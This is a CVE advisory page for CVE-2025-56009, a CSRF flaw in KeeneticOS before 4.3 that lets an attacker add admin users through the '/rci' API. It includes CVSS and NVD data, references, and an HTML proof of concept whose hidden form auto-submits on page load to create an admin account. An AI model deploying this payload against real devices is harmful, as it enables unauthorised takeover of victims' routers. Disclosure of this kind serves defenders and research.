Security Vulnerability Report
CVE-2025-56009 CVSS 5.3 MEDIUM

Published: 2025-10-23 15:15:39
Last Modified: 2026-05-20 20:16:35

Description

Cross-site request forgery (CSRF) vulnerability in KeeneticOS before 4.3 at the "/rci" API endpoint allows attackers to take over the device by adding additional users with full permissions, by tricking the victim into opening a page containing the exploit.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:keenetic:keeneticos:*:*:*:*:*:*:*:* - VULNERABLE
KeeneticOS < 4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CSRF PoC for CVE-2025-56009 - Add admin user -->
<html>
<body>
<h2>CVE-2025-56009 CSRF Exploit</h2>
<p>KeeneticOS < 4.3 /rci API CSRF to add admin user</p>
<form action="http://[TARGET_IP]/rci" method="POST" id="exploit">
  <input type="hidden" name='["user", "add", "testuser"]' value="" />
  <input type="hidden" name='["user", "testuser", "password"]' value="AttackerPass123" />
  <input type="hidden" name='["user", "testuser", "role"]' value="admin" />
</form>
<script>
// Auto-submit the form when page loads
document.getElementById('exploit').submit();
</script>
<p>If you see this message, the exploit has been sent.</p>
</body>
</html>

References

https://github.com/notdenied/writeups/blob/main/CVE/CVE-2025-56009.md
https://keenetic.com/ (Product)
https://keenetic.com/global/security#october-2025-web-api-vulnerabilities (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56009", "sourceIdentifier": "[email protected]", "published": "2025-10-23T15:15:39.347", "lastModified": "2026-05-20T20:16:35.300", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross site request forgery (CSRF) vulnerability in KeeneticOS before 4.3 at \"/rci\" API endpoint allows attackers to take over the device via adding additional users with full permissions by managing the victim to open page with exploit."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:keenetic:keeneticos:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.3", "matchCriteriaId": "31463ACE-A8BB-4E5D-AA71-1BC479DE8AA4"}]}]}], "references": [{"url": "https://github.com/notdenied/writeups/blob/main/CVE/CVE-2025-56009.md", "source": "[email protected]"}, {"url": "https://keenetic.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://keenetic.com/global/security#october-2025-web-api-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}